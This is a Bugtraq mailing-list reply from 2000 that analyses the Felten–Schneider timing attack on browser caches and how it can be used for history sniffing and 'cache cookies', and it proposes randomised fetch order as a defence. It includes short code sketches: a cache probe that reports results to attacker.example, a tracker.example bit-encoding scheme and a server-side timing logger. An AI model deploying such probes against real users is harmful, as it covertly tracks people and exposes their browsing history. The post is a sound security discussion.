Bugtraq mailing list archives

Re: cache cookies?


From: Robert Bihlmeyer <robbe () ORCUS PRIV AT>
Date: Thu, 14 Dec 2000 01:15:08 +0100

cypherstar <cypherstuff () vrl com au> writes:

> Has this been sighted already?

IIRC this has not appeared on Bugtraq. Interesting pointer!

> or is it snakeoil?
>
> http://www.princeton.edu/pr/news/00/q4/1205-browser.htm

IMO quite plausible, although I'm not convinced it will work that well
in practice - for more comments see below.

More details than the press release provides can be found in "Timing
Attacks on Web Privacy. Edward W. Felten and Michael A. Schneider.
Proc. of 7th ACM Conference on Computer and Communications Security,
Nov. 2000."
<URL:http://www.acm.org/pubs/articles/proceedings/commsec/352600/p25-felten/p25-felten.pdf>
(8 pages/83 kB)

Abstract from the paper:

| We describe a class of attacks that can compromise the privacy of
| users' Web-browsing histories. The attacks allow a malicious Web
| site to determine whether or not the user has recently visited some
| other, unrelated Web page. The malicious page can determine this
| information by measuring the time the user's browser requires to
| perform certain operations. Since browsers perform various forms of
| caching, the time required for operations depends on the user's
| browsing history; this paper shows that the resulting time
| variations convey enough information to compromise users' privacy.
| This attack method also allows other types of information gathering
| by Web sites, such as a more invasive form of Web "cookies". The
| attacks we describe can be carried out without the victim's
| knowledge, and most "anonymous browsing" tools fail to prevent them.
| Other simple countermeasures also fail to prevent these attacks. We
| describe a way of reengineering browsers to prevent most of them.

My comments:

The attack's goal is to determine whether a URL U is cached or not.
(The method is probabilistic and may guess wrong; error rates should
be below 10 % in common settings[1].) The authors suggest two
applications of this kind of knowledge: (a) it is valuable to know
whether a visitor has recently visited certain other sites (think:
competitors), and (b) it allows persistent state akin to cookies to be
stored without the user noticing.

They offer some cures (like disabling caching), and note that these
are unsatisfactory. True, all the straightforward solutions are about
as bad as the problem itself. But that does not mean better remedies
do not exist!

First, I would very much like to know how Felten and Schneider
accomplish the timing of URL loading in practice. They mention Java
and JavaScript as the best method. That is of course easily prevented
by turning those off, and I don't think many people concerned about
privacy have them enabled except for special sites. But even without
J/JS, they say, it is possible to instruct the browser to fetch URLs
*one after another*[2].
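
To make the script-based measurement concrete, here is a rough sketch
of my own (not the paper's code) in JavaScript/TypeScript notation;
attacker.example, competitor.example and the threshold value are
made-up placeholders:

    // Sketch of a script-based cache probe.  A load time well below
    // the threshold suggests the resource came from the browser cache.
    function probe(url: string, thresholdMs: number): void {
      const img = new Image();
      const start = Date.now();
      img.onload = () => {
        const elapsed = Date.now() - start;
        // report the guess back to the probing site
        new Image().src = "http://attacker.example/log?cached="
          + (elapsed < thresholdMs) + "&t=" + elapsed;
      };
      img.src = url;   // resource of the unrelated site being probed
    }

    probe("http://competitor.example/logo.gif", 50);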

Offhand, I can't think of a trick to accomplish that, as browsers
will usually fetch multiple resources in parallel. There certainly is
specific HTML code that persuades the popular browsers to fetch those
URLs in series (I'd still like to see that code, though). But unless
the order is determined by adherence to some web standard, browsers
could still change it at will. At the moment, sub-resources (embedded
IMGs, etc.) are probably fetched deterministically first-to-last.
They could just as well be downloaded in random order. Unless there
is a secret I'm overlooking, this would thwart two thirds of the
measurements.
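
To make that countermeasure idea concrete - this is purely a sketch of
the idea, not any browser's actual code - randomizing the fetch order
could be as simple as a Fisher-Yates shuffle over the list of embedded
resources:

    // Sketch only: shuffle the sub-resource URLs before fetching them,
    // so the download order is no longer deterministic.
    function shuffledFetchOrder(resources: string[]): string[] {
      const order = resources.slice();
      for (let i = order.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [order[i], order[j]] = [order[j], order[i]];
      }
      return order;
    }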

To the applications: I doubt that (a) will see much use. One can only
check against a few URLs, and even single requests will certainly
raise somebody's suspicion. That's bad PR waiting to happen, with the
overall benefits being quite dubious. Hell, if (their example) you use
your competitor's logo for those checks, I'm sure a moderately good
lawyer could give your company some painful copyright/trademark/etc.
headaches. You're not up against some paranoid users here, you're up
against a competitor that is threatening enough that you feel the need
to spy on him!

(b) is more plausible. I can't reproduce their assessment, though,
that traditional cookies store few enough bits for mapping them onto
"cache cookies" to be feasible. The most common use for cookies (or
at least the use that most people object to) is to store unique
identifiers for visitors. Even a small web shop needs more than 10
bits for that - a quick perusal of the cookies offered by major
websites suggests that they use visitor ids in the range of 32 bits
and beyond.
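
To illustrate the size problem - again just my own sketch, with
tracker.example and the URL naming invented for the example - writing
a 32-bit visitor id as a "cache cookie" needs on the order of one
probe URL per bit:

    // Hypothetical: "write" a visitor id into the cache by making the
    // browser fetch (and thus cache) bit-i.gif for every bit i that is
    // set.  Reading it back later means timing all `bits` URLs again.
    function bitUrls(visitorId: number, bits: number): string[] {
      const urls: string[] = [];
      for (let i = 0; i < bits; i++) {
        if ((visitorId >>> i) & 1) {
          urls.push("http://tracker.example/bit-" + i + ".gif");
        }
      }
      return urls;
    }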

I can imagine a site pulling this off with, say, 15 URLs without
raising much suspicion. But 30 or 40? You either have to tack this
stuff onto the end of your page, which makes it very fishy; or try to
hide it in your layout (perhaps all those transparent space.gifs are
now called 0.gif, 1.gif, _0.gif, _1.gif, etc.), which is still
somewhat fishy /and/ increases the time until your layout
finalizes[3].

All in all, this is interesting food for thought. Developers of future
browser versions should definitely be aware of this issue.


Footnotes:
[1] These rates are not really bad. Marketing is not rocket science,
and can live with even worse results.

[2] The J/JS-less method depends on that. In effect the browser
fetches URLs A, then U, then B, where U is the one you want to
measure, and A and B are reference URLs on your site. The timespan
between the access times measured by your server for A and B
approximates the load time of U.
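
For concreteness, the server side of that trick could look roughly
like the following sketch (my own illustration, not the authors'; the
paths /a.gif and /b.gif are made up, it identifies clients naively by
address, and it assumes the browser really fetches A, U, B strictly in
order):

    // Sketch: log the gap between serving A and B for each client;
    // that gap approximates how long the probed URL U took in between.
    import * as http from "http";

    const servedA = new Map<string, number>();

    http.createServer((req, res) => {
      const client = req.socket.remoteAddress || "unknown";
      if (req.url === "/a.gif") {
        servedA.set(client, Date.now());
      } else if (req.url === "/b.gif") {
        const t = servedA.get(client);
        if (t !== undefined) {
          console.log(client + " took ~" + (Date.now() - t) + " ms for U");
        }
      }
      res.end();
    }).listen(8080);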

[3] Remember that about half of the URLs fetched while reading a
cookie will not come from the cache, and that they MUST be fetched one
after another. So we have 15-20 (presumably small) resources that will
take about one round-trip in latency each. That's certainly around a
second, perhaps more like two or three.
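(For instance, assuming - my guess, not a figure from the paper - a
round-trip time of 100-150 ms, 15-20 serialized fetches add roughly
1.5 to 3 seconds on top of the normal page load.)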

--
Robbe
